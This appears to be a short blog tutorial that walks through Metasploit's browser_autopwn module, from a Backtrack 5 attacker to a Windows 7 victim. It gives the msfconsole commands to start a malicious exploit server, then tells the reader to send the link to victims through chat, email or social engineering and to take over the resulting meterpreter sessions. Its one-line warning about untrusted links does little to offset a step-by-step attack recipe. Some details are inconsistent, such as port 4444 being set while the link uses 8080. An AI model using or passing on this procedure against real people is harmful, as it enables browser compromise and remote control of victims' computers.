In
nowdays due to firewall restrictions and patch management policies exploitation
of systems become more difficult .However one of the most efficient way to use
of client side attacks.
Browser
Autopwn is one of the client side attack. Here we will examine the
effectiveness of the Metasploit Browser Autopwn Module.
The
Basic Idea behind that module is that it creates a web server in our local
machine which will contain different kind of browser exploits. When the user
will open the malicious link then the execution of the exploits will start
against the browser of the user and if one of the exploits is successful a
meterpreter session will open.
Set up Required
Attacker: Backtrack 5
Victim: Windows 7
Step 1:Open Backtrack terminal and type msfconsole
Step 2: Now type use auxiliary/server/browser_autopwn
Step 3: Now set LHOST, PORT, URIPATH
msf auxiliary(browser_autopwn) > set lhost 192.168.5.236
msf auxiliary(browser_autopwn)> set port 4444 (you can use port 80 also)
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > exploit
Send the link of the server to the victim via chat or email or any
social engineering technique.
http://192.168.5.236:8080
You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Conclusion
Most of the organizations are behind
proxy firewalls so only the port 80 is allowed and many employees are using social
networks these days. An attacker can exploit that and send malicious link to user through social
networks to users. So, Metasploit Browser Autopwn Module is the proof of how
dangerous is to open links that are coming from untrusted sources.
No comments:
Post a Comment